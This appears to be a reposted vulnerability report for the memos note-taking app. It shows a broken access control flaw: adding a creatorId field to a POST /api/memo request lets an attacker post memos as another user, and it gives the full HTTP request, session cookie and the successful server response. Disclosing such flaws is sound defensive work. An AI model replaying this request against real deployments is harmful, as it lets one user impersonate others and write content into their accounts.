Site icon API Security Blog

An attacker can be post message in other memos page

# Description
An attacker can be post malicious content to other user’s memos page via POST request, attacker just add an `creatorID` into body request and send it with Burpsuite

**Here is video poc**: https://drive.google.com/file/d/1dNKo-ybfguam4YdvmluYujN2nkTG5D9G/view?usp=share_link
# Proof of Concept
“`
POST /api/memo HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjA0OTc2MnxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfLUE9fO9PeYJaiVNyk3XeLr92UBxuKGY5S-4YXFqSUSCvaAvB
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 116
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{
“creatorId”:104,
“content”:”post this message in demouser wall “,”visibility”:”PRIVATE”,
“resourceIdList”:[]
}
“`
# Server Response:
“`
HTTP/2 200 OK
Date: Mon, 26 Dec 2022 10:29:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 423
Cf-Ray: 77f9233de8d5231a-HKG
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=”:443″; ma=86400, h3-29=”:443″; ma=86400

{“data”:{“id”:1054,”rowStatus”:”NORMAL”,”creatorId”:104,”createdTs”:1672050590,”updatedTs”:1672050590,”content”:”post this message in demouser wall “,”visibility”:”PRIVATE”,”pinned”:false,”displayTs”:1672050590,”creator”:{“id”:104,”rowStatus”:”NORMAL”,”createdTs”:1672035458,”updatedTs”:1672035527,”username”:”demouser”,”role”:”USER”,”email”:””,”nickname”:”demouser”,”openId”:””,”userSettingList”:null},”resourceList”:[]}}
“`Read More

Exit mobile version